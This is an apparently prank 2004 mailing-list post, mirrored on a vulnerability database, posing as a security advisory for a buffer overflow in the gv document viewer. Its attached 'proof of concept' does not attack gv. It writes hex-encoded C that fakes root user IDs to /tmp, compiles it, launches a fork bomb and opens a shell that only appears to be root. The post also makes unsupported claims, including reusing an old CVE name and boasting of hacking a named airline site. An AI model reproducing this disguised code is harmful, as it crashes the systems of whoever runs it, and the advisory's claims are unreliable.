Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:6575
HistoryAug 04, 2004 - 12:00 a.m.

[Full-Disclosure] IFH-ADV-31339 Exploitable Buffer Overflow in gv

2004-08-0400:00:00
vulners.com
17
JSON

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Exploitable Buffer Overflow in gv

Infohacking Security Advisory 08.04.04
www.infohacking.com
Aug 04, 2004

I. BACKGROUND

Infohacking team (me and myself) discovered a new and unreported local
root vulnerability in gv.

II. DESCRIPTION

The gv program that is shipped on many Unix systems contains a buffer
overflow which can be exploited by an attacker sending a malformed
postscript or Adobe pdf file. The attacker would be able to cause
arbitrary code to run with the privileges of the victim on his Linux
computer. The gv program is a PDF and postscript viewing program for
Unix which interfaces with the ghostscript interpreter. It is
maintained at http://www.thep.physik.uni-mainz.de/~plass/gv/ by
Johannes Plass. This particular security vulnerability occurs in the
source code where an unsafe sscanf() call is used to interpret
PostScript and PDF files.

III. ANALYSIS

In order to perform exploitation, an attacker would have to trick a
user into viewing a malformed PDF or PostScript file from the command
line. This may be somewhat easier for Unix based email programs that
associate gv with email attachments. Since gv is not normally
installed setuid root, an attacker would only be able to cause
arbitrary code to run with the privileges of that user. Other
programs that utilize derivatives of gv, such as ggv or kghostview,
may also be vulnerable in similiar ways.

A proof of concept exploit for Red Hat Linux designed by Hugo is
attached to this message. It packages the overflow and shellcode in
the "%%PageOrder:" section of the PDF.

/* !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE
*

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char hellc0de[] = "\x69\x6e\x74\x20\x67\x65\x74\x75\x69\x64\x28\x29\x20\x7b\x20\x72\x65"
"\x74\x75\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x69\x6e\x74\x20\x67\x65\x74"
"\x65\x75\x69\x64\x28\x29\x20\x7b\x20\x72\x65\x74\x75\x72\x6e\x20\x30"
"\x3b\x20\x7d\x0a\x69\x6e\x74\x20\x67\x65\x74\x67\x69\x64\x28\x29\x20"
"\x7b\x20\x72\x65\x74\x75\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x69\x6e\x74"
"\x20\x67\x65\x74\x65\x67\x69\x64\x28\x29\x20\x7b\x20\x72\x65\x74\x75"
"\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x0/bin/sh";

int main()
{
FILE *fp;
char *offset;
fp=fopen("/tmp/own.c","w");
fprintf(fp,"%s",hellc0de);
fclose(fp);

    system&#40;&quot;gcc -shared -o /tmp/own.so /tmp/own.c;rm -f /tmp/own.c&quot;&#41;;
    if &#40;fork&#40;&#41; == 0&#41; {
    sleep&#40;10&#41;; while &#40;1&#41; { fork&#40;&#41;; offset=malloc&#40;512&#41;; }
            exit&#40;0&#41;;
    }
    system&#40;&quot;LD_PRELOAD=/tmp/own.so /bin/sh&quot;&#41;;
    return 0;

}
/* -EOF- */

IV. DETECTION

This vulnerability affects the latest version of gv,. An
exploit has been tested on Red Hat Linux 9 and fedora core 1

V. WORKAROUNDS

To avoid potential exploitation, users can select alternatives to gv
such as Kghostview (included with the KDE desktop environment) for
instance. Additionally, the vulnerability does not seem to be
exploitable when a file is opened from the gv interface instead of
the command line.

VI. CVE INFORMATION

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CAN-2001-0832 to this issue.

VII. DISCLOSURE TIMELINE

03/18/04 Hugo notified the bug to [email protected]
04/11/04 Initial vendor notification - no response
04/30/04 Secondary vendor notification - no response
05/20/04 We hack iberia.com (Hey look at me! im a hax0r and i want a
job)
08/04/04 Public Disclosure

VIII. CREDIT

Hugo Vazquez Carapez http://www.infohacking.com/dirhugo.gif

Get pwned by script kiddies?
Call us, we can hack you again.

IX. LEGAL NOTICES

Copyright (c) 2004 INFOHACKING, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of INFOHACKING. If you wish to reprint the whole or any

part of this alert in any other medium other than electronically, please

email [email protected] for permission.

Disclaimer: Infohacking is pretty whitehat and lame. If you are a part
of the blackhat communitie, please hack and remove us from the net

-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4

wkYEARECAAYFAkEQuHQACgkQPMMEGI9aoadaJgCeO/ZucbpUtWoE2bfzXdM5HsKr708A
nitgAgqunT87dvI/rZq4FFljf047
=zLRb
-----END PGP SIGNATURE-----

Concerned about your privacy? Follow this link to get
secure FREE email: http://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
http://www.hushmail.com/services-messenger?l=434

Promote security and make money with the Hushmail Affiliate Program:
http://www.hushmail.com/about-affiliate?l=427

Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Related

securityvulns 1
cve 1
securityvulns
securityvulns
iDEFENSE Security Advisory 09.26.2002: Exploitable Buffer Overflow in gv
2002-10-01 00:00:00
cve
cve
CVE-2001-0832
2001-12-06 05:00:00
JSON
Related for SECURITYVULNS:DOC:6575
securityvulns1cve1